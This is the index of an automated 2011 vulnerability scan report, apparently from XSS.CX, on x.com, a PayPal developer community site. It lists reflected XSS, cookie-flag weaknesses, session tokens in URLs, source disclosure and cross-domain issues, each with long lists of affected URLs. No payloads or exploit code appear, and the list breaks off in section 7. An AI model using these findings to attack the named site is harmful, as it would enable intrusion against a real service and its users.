XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, x.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Fri Aug 12 09:27:09 GMT-06:00 2011.


1. Cross-site scripting (reflected)

1.1. https://www.x.com/blogs/ [name of an arbitrarily supplied request parameter]

1.2. https://www.x.com/community/ppx/xspaces/introduce [name of an arbitrarily supplied request parameter]

2. SSL cookie without secure flag set

2.1. https://www.x.com/

2.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

2.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

2.4. https://www.x.com/community/home

2.5. https://www.x.com/community/ppx

2.6. https://www.x.com/community/ppx/adaptive_accounts

2.7. https://www.x.com/community/ppx/adaptive_payments

2.8. https://www.x.com/community/ppx/apps101

2.9. https://www.x.com/community/ppx/authentication

2.10. https://www.x.com/community/ppx/businesspayments

2.11. https://www.x.com/community/ppx/button_manager

2.12. https://www.x.com/community/ppx/code_samples

2.13. https://www.x.com/community/ppx/dev-tools

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree

2.15. https://www.x.com/community/ppx/devchallenge

2.16. https://www.x.com/community/ppx/devchallenge/

2.17. https://www.x.com/community/ppx/developer

2.18. https://www.x.com/community/ppx/devtalk

2.19. https://www.x.com/community/ppx/devzone

2.20. https://www.x.com/community/ppx/documentation

2.21. https://www.x.com/community/ppx/ec

2.22. https://www.x.com/community/ppx/feedback

2.23. https://www.x.com/community/ppx/fundraising

2.24. https://www.x.com/community/ppx/global

2.25. https://www.x.com/community/ppx/global/au

2.26. https://www.x.com/community/ppx/global/ca

2.27. https://www.x.com/community/ppx/global/cn

2.28. https://www.x.com/community/ppx/global/de

2.29. https://www.x.com/community/ppx/global/fr

2.30. https://www.x.com/community/ppx/global/it

2.31. https://www.x.com/community/ppx/global/jp

2.32. https://www.x.com/community/ppx/global/mx

2.33. https://www.x.com/community/ppx/global/nl

2.34. https://www.x.com/community/ppx/global/sp

2.35. https://www.x.com/community/ppx/global/uk

2.36. https://www.x.com/community/ppx/ipn

2.37. https://www.x.com/community/ppx/marketplaces

2.38. https://www.x.com/community/ppx/mass_pay

2.39. https://www.x.com/community/ppx/offlineanddevices

2.40. https://www.x.com/community/ppx/p2p

2.41. https://www.x.com/community/ppx/payflow_link

2.42. https://www.x.com/community/ppx/payflow_pro

2.43. https://www.x.com/community/ppx/payflow_xml_reporting

2.44. https://www.x.com/community/ppx/pdt

2.45. https://www.x.com/community/ppx/permissions

2.46. https://www.x.com/community/ppx/press

2.47. https://www.x.com/community/ppx/recurring_billing

2.48. https://www.x.com/community/ppx/recurring_payments

2.49. https://www.x.com/community/ppx/release_notes

2.50. https://www.x.com/community/ppx/sdks

2.51. https://www.x.com/community/ppx/showcase

2.52. https://www.x.com/community/ppx/showcase/ap_directory

2.53. https://www.x.com/community/ppx/support

2.54. https://www.x.com/community/ppx/system_status

2.55. https://www.x.com/community/ppx/testing

2.56. https://www.x.com/community/ppx/training

2.57. https://www.x.com/community/ppx/transaction_information

2.58. https://www.x.com/community/ppx/vt

2.59. https://www.x.com/community/ppx/website_reporting

2.60. https://www.x.com/community/ppx/wpp

2.61. https://www.x.com/community/ppx/wpphosted

2.62. https://www.x.com/community/ppx/wps

2.63. https://www.x.com/community/ppx/xspaces

2.64. https://www.x.com/community/ppx/xspaces/accelerator

2.65. https://www.x.com/community/ppx/xspaces/certification

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing

2.67. https://www.x.com/community/ppx/xspaces/digital_goods

2.68. https://www.x.com/community/ppx/xspaces/finance

2.69. https://www.x.com/community/ppx/xspaces/forums

2.70. https://www.x.com/community/ppx/xspaces/gaming

2.71. https://www.x.com/community/ppx/xspaces/identity

2.72. https://www.x.com/community/ppx/xspaces/innovate

2.73. https://www.x.com/community/ppx/xspaces/introduce

2.74. https://www.x.com/community/ppx/xspaces/mobile

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

2.77. https://www.x.com/community/ppx/xspaces/security

2.78. https://www.x.com/community/ppx/xspaces/social

2.79. https://www.x.com/community/ppx/xspaces/subscriptions

2.80. https://www.x.com/community/ppx/xspaces/toolkits

2.81. https://www.x.com/community/ppx/xspaces/web_checkout

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

2.84. https://www.x.com/community/xcommerce-blogs

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

2.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

2.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

2.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

2.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

2.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

2.92. https://www.x.com/docs/DOC-1031

2.93. https://www.x.com/docs/DOC-1041

2.94. https://www.x.com/docs/DOC-1051

2.95. https://www.x.com/docs/DOC-1106

2.96. https://www.x.com/docs/DOC-1108

2.97. https://www.x.com/docs/DOC-1116

2.98. https://www.x.com/docs/DOC-1176

2.99. https://www.x.com/docs/DOC-1204

2.100. https://www.x.com/docs/DOC-1216

2.101. https://www.x.com/docs/DOC-1332

2.102. https://www.x.com/docs/DOC-1372

2.103. https://www.x.com/docs/DOC-1374

2.104. https://www.x.com/docs/DOC-1401

2.105. https://www.x.com/docs/DOC-1431

2.106. https://www.x.com/docs/DOC-1551

2.107. https://www.x.com/docs/DOC-1613

2.108. https://www.x.com/docs/DOC-2241

2.109. https://www.x.com/docs/DOC-2346

2.110. https://www.x.com/docs/DOC-3201

2.111. https://www.x.com/docs/DOC-3212

2.112. https://www.x.com/docs/DOC-3251

2.113. https://www.x.com/docs/DOC-3271

2.114. https://www.x.com/docs/DOC-3321

2.115. https://www.x.com/docs/DOC-3322

2.116. https://www.x.com/docs/DOC-3323

2.117. https://www.x.com/docs/DOC-3345

2.118. https://www.x.com/docs/DOC-3351

2.119. https://www.x.com/docs/DOC-3352

2.120. https://www.x.com/docs/DOC-3353

2.121. https://www.x.com/docs/DOC-3354

2.122. https://www.x.com/docs/DOC-3355

2.123. https://www.x.com/docs/DOC-3371

2.124. https://www.x.com/docs/DOC-3372

2.125. https://www.x.com/docs/DOC-3373

2.126. https://www.x.com/docs/DOC-3374

2.127. https://www.x.com/docs/DOC-3375

2.128. https://www.x.com/docs/DOC-3426

2.129. https://www.x.com/docs/DOC-3427

2.130. https://www.x.com/docs/DOC-3431

2.131. https://www.x.com/docs/DOC-3443

2.132. https://www.x.com/docs/DOC-3444

2.133. https://www.x.com/docs/DOC-3491

2.134. https://www.x.com/docs/DOC-3561

2.135. https://www.x.com/docs/DOC-3562

2.136. https://www.x.com/docs/DOC-3619

2.137. https://www.x.com/docs/DOC-3688

2.138. https://www.x.com/docs/DOC-3811

2.139. https://www.x.com/docs/DOC-3812

2.140. https://www.x.com/docs/DOC-3836

2.141. https://www.x.com/docs/DOC-3841

2.142. https://www.x.com/message/186684

2.143. https://www.x.com/message/198017

2.144. https://www.x.com/message/211333

2.145. https://www.x.com/message/211439

2.146. https://www.x.com/message/211738

2.147. https://www.x.com/message/212001

2.148. https://www.x.com/message/212124

2.149. https://www.x.com/message/212170

2.150. https://www.x.com/message/212753

2.151. https://www.x.com/message/212906

2.152. https://www.x.com/message/213354

2.153. https://www.x.com/message/213546

2.154. https://www.x.com/message/213568

2.155. https://www.x.com/message/213571

2.156. https://www.x.com/message/213767

2.157. https://www.x.com/message/213787

2.158. https://www.x.com/message/213788

2.159. https://www.x.com/message/213865

2.160. https://www.x.com/message/214347

2.161. https://www.x.com/message/214440

2.162. https://www.x.com/message/214618

2.163. https://www.x.com/message/214902

2.164. https://www.x.com/message/214926

2.165. https://www.x.com/message/215245

2.166. https://www.x.com/message/215254

2.167. https://www.x.com/message/215264

2.168. https://www.x.com/message/215276

2.169. https://www.x.com/message/215291

2.170. https://www.x.com/people/BaldGeek

2.171. https://www.x.com/people/CorinneSherman

2.172. https://www.x.com/people/GiancarloUk2

2.173. https://www.x.com/people/IndieReign

2.174. https://www.x.com/people/JasonVenner

2.175. https://www.x.com/people/MrcheckAPX

2.176. https://www.x.com/people/PP_Igor

2.177. https://www.x.com/people/PP_MTS_Andre

2.178. https://www.x.com/people/PP_MTS_Chad

2.179. https://www.x.com/people/PP_MTS_GuidoT

2.180. https://www.x.com/people/PP_MTS_Magarvin

2.181. https://www.x.com/people/PP_MTS_Patrick

2.182. https://www.x.com/people/PayPalXadmin

2.183. https://www.x.com/people/PayPal_Carolyn

2.184. https://www.x.com/people/PayPal_Sudha

2.185. https://www.x.com/people/PayPal_ToddS

2.186. https://www.x.com/people/Praveen

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

2.188. https://www.x.com/people/RightWayMail

2.189. https://www.x.com/people/S.Aijaz

2.190. https://www.x.com/people/SRS

2.191. https://www.x.com/people/Saleem

2.192. https://www.x.com/people/Shade8934

2.193. https://www.x.com/people/Suneetha

2.194. https://www.x.com/people/admin

2.195. https://www.x.com/people/amypiazza00

2.196. https://www.x.com/people/angelleye

2.197. https://www.x.com/people/billday

2.198. https://www.x.com/people/blingnation2010

2.199. https://www.x.com/people/bryngregory

2.200. https://www.x.com/people/das_licht

2.201. https://www.x.com/people/dchankhour

2.202. https://www.x.com/people/eferreira

2.203. https://www.x.com/people/encore

2.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

2.205. https://www.x.com/people/gazugafan

2.206. https://www.x.com/people/gem

2.207. https://www.x.com/people/gogoeric

2.208. https://www.x.com/people/hotellina

2.209. https://www.x.com/people/iConcessionStand

2.210. https://www.x.com/people/joncas

2.211. https://www.x.com/people/lwhite2104

2.212. https://www.x.com/people/mandeheritage

2.213. https://www.x.com/people/odeskdev

2.214. https://www.x.com/people/omuleanu

2.215. https://www.x.com/people/pluto26

2.216. https://www.x.com/people/posiden5665

2.217. https://www.x.com/people/ramonmorales123

2.218. https://www.x.com/people/rizkygarut

2.219. https://www.x.com/people/roguereptile

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

2.221. https://www.x.com/people/sebastian.kopp@wooga.com

2.222. https://www.x.com/people/skier

3. Session token in URL

3.1. https://www.x.com/images/transparent.png

3.2. https://www.x.com/index.jspa

3.3. https://www.x.com/login.jspa

3.4. https://www.x.com/people/Bill_at_Repaid.com/avatar

3.5. https://www.x.com/people/DaveLeWave/avatar

3.6. https://www.x.com/people/Jareth_2005/avatar

3.7. https://www.x.com/people/Maxatnes/avatar

3.8. https://www.x.com/people/Murugesh_cit/avatar

3.9. https://www.x.com/people/NetGuy/avatar

3.10. https://www.x.com/people/PP_MTS_Chad/avatar

3.11. https://www.x.com/people/PP_MTS_Magarvin/avatar

3.12. https://www.x.com/people/Saveby/avatar

3.13. https://www.x.com/people/TrainingPal/avatar

3.14. https://www.x.com/people/WebBusinessDeveloper/avatar

3.15. https://www.x.com/people/advance-software/avatar

3.16. https://www.x.com/people/alfrednutile/avatar

3.17. https://www.x.com/people/appcode/avatar

3.18. https://www.x.com/people/cariad/avatar

3.19. https://www.x.com/people/christiancrest/avatar

3.20. https://www.x.com/people/ezimerchant/avatar

3.21. https://www.x.com/people/inhouse/avatar

3.22. https://www.x.com/people/jameshill/avatar

3.23. https://www.x.com/people/judemichael2001/avatar

3.24. https://www.x.com/people/lilbugclothing/avatar

3.25. https://www.x.com/people/lovelycar8888/avatar

3.26. https://www.x.com/people/lurobertson/avatar

3.27. https://www.x.com/people/mbtmobile/avatar

3.28. https://www.x.com/people/michaelcaplan/avatar

3.29. https://www.x.com/people/mikertjones/avatar

3.30. https://www.x.com/people/moneygun/avatar

3.31. https://www.x.com/people/pdumas/avatar

3.32. https://www.x.com/people/structuralartistry/avatar

3.33. https://www.x.com/people/theatreus/avatar

3.34. https://www.x.com/people/thomlizpa/avatar

3.35. https://www.x.com/people/tifroz/avatar

3.36. https://www.x.com/people/tim_hunt/avatar

3.37. https://www.x.com/people/timneu22/avatar

3.38. https://www.x.com/people/vmchatt/avatar

3.39. https://www.x.com/people/xavijr/avatar

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

3.46. https://www.x.com/plugins/idea-type-plugin/resources/styles/idea.css

3.47. https://www.x.com/resources/images/status/statusicon-01.gif

3.48. https://www.x.com/resources/scripts/fancyzoom/images/

3.49. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

3.50. https://www.x.com/resources/scripts/gen/5542325f4f5def5174140ea38a0251ad.js

3.51. https://www.x.com/styles/jive-community.css

3.52. https://www.x.com/styles/jive-videomodule.css

3.53. https://www.x.com/themes/paypal/images/favicon.ico

3.54. https://www.x.com/themes/paypal/images/favicon.png

3.55. https://www.x.com/themes/paypal/images/paypal_x_group_logo.png

3.56. https://www.x.com/themes/paypal/js/custom.js

4. Cookie without HttpOnly flag set

4.1. https://www.x.com/

4.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

4.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

4.4. https://www.x.com/community/home

4.5. https://www.x.com/community/ppx

4.6. https://www.x.com/community/ppx/adaptive_accounts

4.7. https://www.x.com/community/ppx/adaptive_payments

4.8. https://www.x.com/community/ppx/apps101

4.9. https://www.x.com/community/ppx/authentication

4.10. https://www.x.com/community/ppx/businesspayments

4.11. https://www.x.com/community/ppx/button_manager

4.12. https://www.x.com/community/ppx/code_samples

4.13. https://www.x.com/community/ppx/dev-tools

4.14. https://www.x.com/community/ppx/dev-tools/decision_tree

4.15. https://www.x.com/community/ppx/devchallenge

4.16. https://www.x.com/community/ppx/devchallenge/

4.17. https://www.x.com/community/ppx/developer

4.18. https://www.x.com/community/ppx/devtalk

4.19. https://www.x.com/community/ppx/devzone

4.20. https://www.x.com/community/ppx/documentation

4.21. https://www.x.com/community/ppx/ec

4.22. https://www.x.com/community/ppx/feedback

4.23. https://www.x.com/community/ppx/fundraising

4.24. https://www.x.com/community/ppx/global

4.25. https://www.x.com/community/ppx/global/au

4.26. https://www.x.com/community/ppx/global/ca

4.27. https://www.x.com/community/ppx/global/cn

4.28. https://www.x.com/community/ppx/global/de

4.29. https://www.x.com/community/ppx/global/fr

4.30. https://www.x.com/community/ppx/global/it

4.31. https://www.x.com/community/ppx/global/jp

4.32. https://www.x.com/community/ppx/global/mx

4.33. https://www.x.com/community/ppx/global/nl

4.34. https://www.x.com/community/ppx/global/sp

4.35. https://www.x.com/community/ppx/global/uk

4.36. https://www.x.com/community/ppx/ipn

4.37. https://www.x.com/community/ppx/marketplaces

4.38. https://www.x.com/community/ppx/mass_pay

4.39. https://www.x.com/community/ppx/offlineanddevices

4.40. https://www.x.com/community/ppx/p2p

4.41. https://www.x.com/community/ppx/payflow_link

4.42. https://www.x.com/community/ppx/payflow_pro

4.43. https://www.x.com/community/ppx/payflow_xml_reporting

4.44. https://www.x.com/community/ppx/pdt

4.45. https://www.x.com/community/ppx/permissions

4.46. https://www.x.com/community/ppx/press

4.47. https://www.x.com/community/ppx/recurring_billing

4.48. https://www.x.com/community/ppx/recurring_payments

4.49. https://www.x.com/community/ppx/release_notes

4.50. https://www.x.com/community/ppx/sdks

4.51. https://www.x.com/community/ppx/showcase

4.52. https://www.x.com/community/ppx/showcase/ap_directory

4.53. https://www.x.com/community/ppx/support

4.54. https://www.x.com/community/ppx/system_status

4.55. https://www.x.com/community/ppx/testing

4.56. https://www.x.com/community/ppx/training

4.57. https://www.x.com/community/ppx/transaction_information

4.58. https://www.x.com/community/ppx/vt

4.59. https://www.x.com/community/ppx/website_reporting

4.60. https://www.x.com/community/ppx/wpp

4.61. https://www.x.com/community/ppx/wpphosted

4.62. https://www.x.com/community/ppx/wps

4.63. https://www.x.com/community/ppx/xspaces

4.64. https://www.x.com/community/ppx/xspaces/accelerator

4.65. https://www.x.com/community/ppx/xspaces/certification

4.66. https://www.x.com/community/ppx/xspaces/cloud-computing

4.67. https://www.x.com/community/ppx/xspaces/digital_goods

4.68. https://www.x.com/community/ppx/xspaces/finance

4.69. https://www.x.com/community/ppx/xspaces/forums

4.70. https://www.x.com/community/ppx/xspaces/gaming

4.71. https://www.x.com/community/ppx/xspaces/identity

4.72. https://www.x.com/community/ppx/xspaces/innovate

4.73. https://www.x.com/community/ppx/xspaces/introduce

4.74. https://www.x.com/community/ppx/xspaces/mobile

4.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

4.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

4.77. https://www.x.com/community/ppx/xspaces/security

4.78. https://www.x.com/community/ppx/xspaces/social

4.79. https://www.x.com/community/ppx/xspaces/subscriptions

4.80. https://www.x.com/community/ppx/xspaces/toolkits

4.81. https://www.x.com/community/ppx/xspaces/web_checkout

4.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

4.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

4.84. https://www.x.com/community/xcommerce-blogs

4.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

4.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

4.87. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

4.88. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

4.89. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

4.90. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

4.91. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

4.92. https://www.x.com/docs/DOC-1031

4.93. https://www.x.com/docs/DOC-1041

4.94. https://www.x.com/docs/DOC-1051

4.95. https://www.x.com/docs/DOC-1106

4.96. https://www.x.com/docs/DOC-1108

4.97. https://www.x.com/docs/DOC-1116

4.98. https://www.x.com/docs/DOC-1176

4.99. https://www.x.com/docs/DOC-1204

4.100. https://www.x.com/docs/DOC-1216

4.101. https://www.x.com/docs/DOC-1332

4.102. https://www.x.com/docs/DOC-1372

4.103. https://www.x.com/docs/DOC-1374

4.104. https://www.x.com/docs/DOC-1401

4.105. https://www.x.com/docs/DOC-1431

4.106. https://www.x.com/docs/DOC-1551

4.107. https://www.x.com/docs/DOC-1613

4.108. https://www.x.com/docs/DOC-2241

4.109. https://www.x.com/docs/DOC-2346

4.110. https://www.x.com/docs/DOC-3201

4.111. https://www.x.com/docs/DOC-3212

4.112. https://www.x.com/docs/DOC-3251

4.113. https://www.x.com/docs/DOC-3271

4.114. https://www.x.com/docs/DOC-3321

4.115. https://www.x.com/docs/DOC-3322

4.116. https://www.x.com/docs/DOC-3323

4.117. https://www.x.com/docs/DOC-3345

4.118. https://www.x.com/docs/DOC-3351

4.119. https://www.x.com/docs/DOC-3352

4.120. https://www.x.com/docs/DOC-3353

4.121. https://www.x.com/docs/DOC-3354

4.122. https://www.x.com/docs/DOC-3355

4.123. https://www.x.com/docs/DOC-3371

4.124. https://www.x.com/docs/DOC-3372

4.125. https://www.x.com/docs/DOC-3373

4.126. https://www.x.com/docs/DOC-3374

4.127. https://www.x.com/docs/DOC-3375

4.128. https://www.x.com/docs/DOC-3426

4.129. https://www.x.com/docs/DOC-3427

4.130. https://www.x.com/docs/DOC-3431

4.131. https://www.x.com/docs/DOC-3443

4.132. https://www.x.com/docs/DOC-3444

4.133. https://www.x.com/docs/DOC-3491

4.134. https://www.x.com/docs/DOC-3561

4.135. https://www.x.com/docs/DOC-3562

4.136. https://www.x.com/docs/DOC-3619

4.137. https://www.x.com/docs/DOC-3688

4.138. https://www.x.com/docs/DOC-3811

4.139. https://www.x.com/docs/DOC-3812

4.140. https://www.x.com/docs/DOC-3836

4.141. https://www.x.com/docs/DOC-3841

4.142. https://www.x.com/message/186684

4.143. https://www.x.com/message/198017

4.144. https://www.x.com/message/211333

4.145. https://www.x.com/message/211439

4.146. https://www.x.com/message/211738

4.147. https://www.x.com/message/212001

4.148. https://www.x.com/message/212124

4.149. https://www.x.com/message/212170

4.150. https://www.x.com/message/212753

4.151. https://www.x.com/message/212906

4.152. https://www.x.com/message/213354

4.153. https://www.x.com/message/213546

4.154. https://www.x.com/message/213568

4.155. https://www.x.com/message/213571

4.156. https://www.x.com/message/213767

4.157. https://www.x.com/message/213787

4.158. https://www.x.com/message/213788

4.159. https://www.x.com/message/213865

4.160. https://www.x.com/message/214347

4.161. https://www.x.com/message/214440

4.162. https://www.x.com/message/214618

4.163. https://www.x.com/message/214902

4.164. https://www.x.com/message/214926

4.165. https://www.x.com/message/215245

4.166. https://www.x.com/message/215254

4.167. https://www.x.com/message/215264

4.168. https://www.x.com/message/215276

4.169. https://www.x.com/message/215291

4.170. https://www.x.com/people/BaldGeek

4.171. https://www.x.com/people/CorinneSherman

4.172. https://www.x.com/people/GiancarloUk2

4.173. https://www.x.com/people/IndieReign

4.174. https://www.x.com/people/JasonVenner

4.175. https://www.x.com/people/MrcheckAPX

4.176. https://www.x.com/people/PP_Igor

4.177. https://www.x.com/people/PP_MTS_Andre

4.178. https://www.x.com/people/PP_MTS_Chad

4.179. https://www.x.com/people/PP_MTS_GuidoT

4.180. https://www.x.com/people/PP_MTS_Magarvin

4.181. https://www.x.com/people/PP_MTS_Patrick

4.182. https://www.x.com/people/PayPalXadmin

4.183. https://www.x.com/people/PayPal_Carolyn

4.184. https://www.x.com/people/PayPal_Sudha

4.185. https://www.x.com/people/PayPal_ToddS

4.186. https://www.x.com/people/Praveen

4.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

4.188. https://www.x.com/people/RightWayMail

4.189. https://www.x.com/people/S.Aijaz

4.190. https://www.x.com/people/SRS

4.191. https://www.x.com/people/Saleem

4.192. https://www.x.com/people/Shade8934

4.193. https://www.x.com/people/Suneetha

4.194. https://www.x.com/people/admin

4.195. https://www.x.com/people/amypiazza00

4.196. https://www.x.com/people/angelleye

4.197. https://www.x.com/people/billday

4.198. https://www.x.com/people/blingnation2010

4.199. https://www.x.com/people/bryngregory

4.200. https://www.x.com/people/das_licht

4.201. https://www.x.com/people/dchankhour

4.202. https://www.x.com/people/eferreira

4.203. https://www.x.com/people/encore

4.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

4.205. https://www.x.com/people/gazugafan

4.206. https://www.x.com/people/gem

4.207. https://www.x.com/people/gogoeric

4.208. https://www.x.com/people/hotellina

4.209. https://www.x.com/people/iConcessionStand

4.210. https://www.x.com/people/joncas

4.211. https://www.x.com/people/lwhite2104

4.212. https://www.x.com/people/mandeheritage

4.213. https://www.x.com/people/odeskdev

4.214. https://www.x.com/people/omuleanu

4.215. https://www.x.com/people/pluto26

4.216. https://www.x.com/people/posiden5665

4.217. https://www.x.com/people/ramonmorales123

4.218. https://www.x.com/people/rizkygarut

4.219. https://www.x.com/people/roguereptile

4.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

4.221. https://www.x.com/people/sebastian.kopp@wooga.com

4.222. https://www.x.com/people/skier

5. Source code disclosure

5.1. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

5.2. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

5.3. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

5.4. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

5.5. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

5.6. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

5.7. https://www.x.com/themes/paypal/js/custom.js

6. Cross-domain Referer leakage

6.1. https://www.x.com/community/feeds

6.2. https://www.x.com/community/ppx

6.3. https://www.x.com/community/ppx/button_manager

6.4. https://www.x.com/community/ppx/dev-tools

6.5. https://www.x.com/community/ppx/developer

6.6. https://www.x.com/community/ppx/ec

6.7. https://www.x.com/community/ppx/global

6.8. https://www.x.com/community/ppx/showcase

6.9. https://www.x.com/community/ppx/xspaces

6.10. https://www.x.com/community/ppx/xspaces/accelerator

6.11. https://www.x.com/community/ppx/xspaces/certification

6.12. https://www.x.com/community/ppx/xspaces/cloud-computing

6.13. https://www.x.com/community/ppx/xspaces/digital_goods

6.14. https://www.x.com/community/ppx/xspaces/finance

6.15. https://www.x.com/community/ppx/xspaces/forums

6.16. https://www.x.com/community/ppx/xspaces/gaming

6.17. https://www.x.com/community/ppx/xspaces/identity

6.18. https://www.x.com/community/ppx/xspaces/innovate

6.19. https://www.x.com/community/ppx/xspaces/introduce

6.20. https://www.x.com/community/ppx/xspaces/mobile

6.21. https://www.x.com/community/ppx/xspaces/security

6.22. https://www.x.com/community/ppx/xspaces/social

6.23. https://www.x.com/community/ppx/xspaces/subscriptions

6.24. https://www.x.com/community/ppx/xspaces/web_checkout

6.25. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

6.26. https://www.x.com/community/xcommerce-blogs

6.27. https://www.x.com/docs/DOC-1106

6.28. https://www.x.com/index.jspa

6.29. https://www.x.com/people

6.30. https://www.x.com/people/BaldGeek

6.31. https://www.x.com/tags

7. Cross-domain script include

7.1. https://www.x.com/blogs/

7.2. https://www.x.com/blogs/josh/2011/03/29/paypal-integration-resources

7.3. https://www.x.com/blogs/matt/2010/08/10/retrieving-your-api-credentials

7.4. https://www.x.com/bookmarks/

7.5. https://www.x.com/community/

7.6. https://www.x.com/community/emailPasswordToken!input.jspa

7.7. https://www.x.com/community/feeds

7.8. https://www.x.com/community/home

7.9. https://www.x.com/community/ppx

7.10. https://www.x.com/community/ppx/adaptive_accounts

7.11. https://www.x.com/community/ppx/adaptive_payments

7.12. https://www.x.com/community/ppx/apps101

7.13. https://www.x.com/community/ppx/authentication

7.14. https://www.x.com/community/ppx/businesspayments

7.15. https://www.x.com/community/ppx/button_manager

7.16. https://www.x.com/community/ppx/code_samples

7.17. https://www.x.com/community/ppx/dev-tools

7.18. https://www.x.com/community/ppx/dev-tools/decision_tree

7.19. https://www.x.com/community/ppx/devchallenge

7.20. https://www.x.com/community/ppx/devchallenge/

7.21. https://www.x.com/community/ppx/developer

7.22. https://www.x.com/community/ppx/devtalk

7.23. https://www.x.com/community/ppx/devzone

7.24. https://www.x.com/community/ppx/documentation

7.25. https://www.x.com/community/ppx/ec

7.26. https://www.x.com/community/ppx/emailPasswordToken!input.jspa

7.27. https://www.x.com/community/ppx/feedback

7.28. https://www.x.com/community/ppx/fundraising

7.29. https://www.x.com/community/ppx/global

7.30. https://www.x.com/community/ppx/global/au

7.31. https://www.x.com/community/ppx/global/ca

7.32. https://www.x.com/community/ppx/global/cn

7.33. https://www.x.com/community/ppx/global/de

7.34. https://www.x.com/community/ppx/global/fr

7.35. https://www.x.com/community/ppx/global/it

7.36. https://www.x.com/community/ppx/global/jp

7.37. https://www.x.com/community/ppx/global/mx

7.38. https://www.x.com/community/ppx/global/nl

7.39. https://www.x.com/community/ppx/global/sp

7.40. https://www.x.com/community/ppx/global/uk

7.41. https://www.x.com/community/ppx/ipn

7.42. https://www.x.com/community/ppx/marketplaces

7.43. https://www.x.com/community/ppx/mass_pay

7.44. https://www.x.com/community/ppx/offlineanddevices

7.45. https://www.x.com/community/ppx/p2p

7.46. https://www.x.com/community/ppx/payflow_link

7.47. https://www.x.com/community/ppx/payflow_pro

7.48. https://www.x.com/community/ppx/payflow_xml_reporting

7.49. https://www.x.com/community/ppx/pdt

7.50. https://www.x.com/community/ppx/permissions

7.51. https://www.x.com/community/ppx/press

7.52. https://www.x.com/community/ppx/recurring_billing

7.53. https://www.x.com/community/ppx/recurring_payments

7.54. https://www.x.com/community/ppx/release_notes

7.55. https://www.x.com/community/ppx/sdks

7.56. https://www.x.com/community/ppx/showcase

7.57. https://www.x.com/community/ppx/showcase/ap_directory

7.58. https://www.x.com/community/ppx/support

7.59. https://www.x.com/community/ppx/system_status

7.60. https://www.x.com/community/ppx/testing

7.61. https://www.x.com/community/ppx/training

7.62. https://www.x.com/community/ppx/transaction_information

7.63. https://www.x.com/community/ppx/vt

7.64. https://www.x.com/community/ppx/website_reporting

7.65. https://www.x.com/community/ppx/wpp

7.66. https://www.x.com/community/ppx/wpphosted

7.67. https://www.x.com/community/ppx/wps

7.68. https://www.x.com/community/ppx/xspaces

7.69. https://www.x.com/community/ppx/xspaces/accelerator

7.70. https://www.x.com/community/ppx/xspaces/certification

7.71. https://www.x.com/community/ppx/xspaces/cloud-computing

7.72. https://www.x.com/community/ppx/xspaces/digital_goods

7.73. https://www.x.com/community/ppx/xspaces/finance

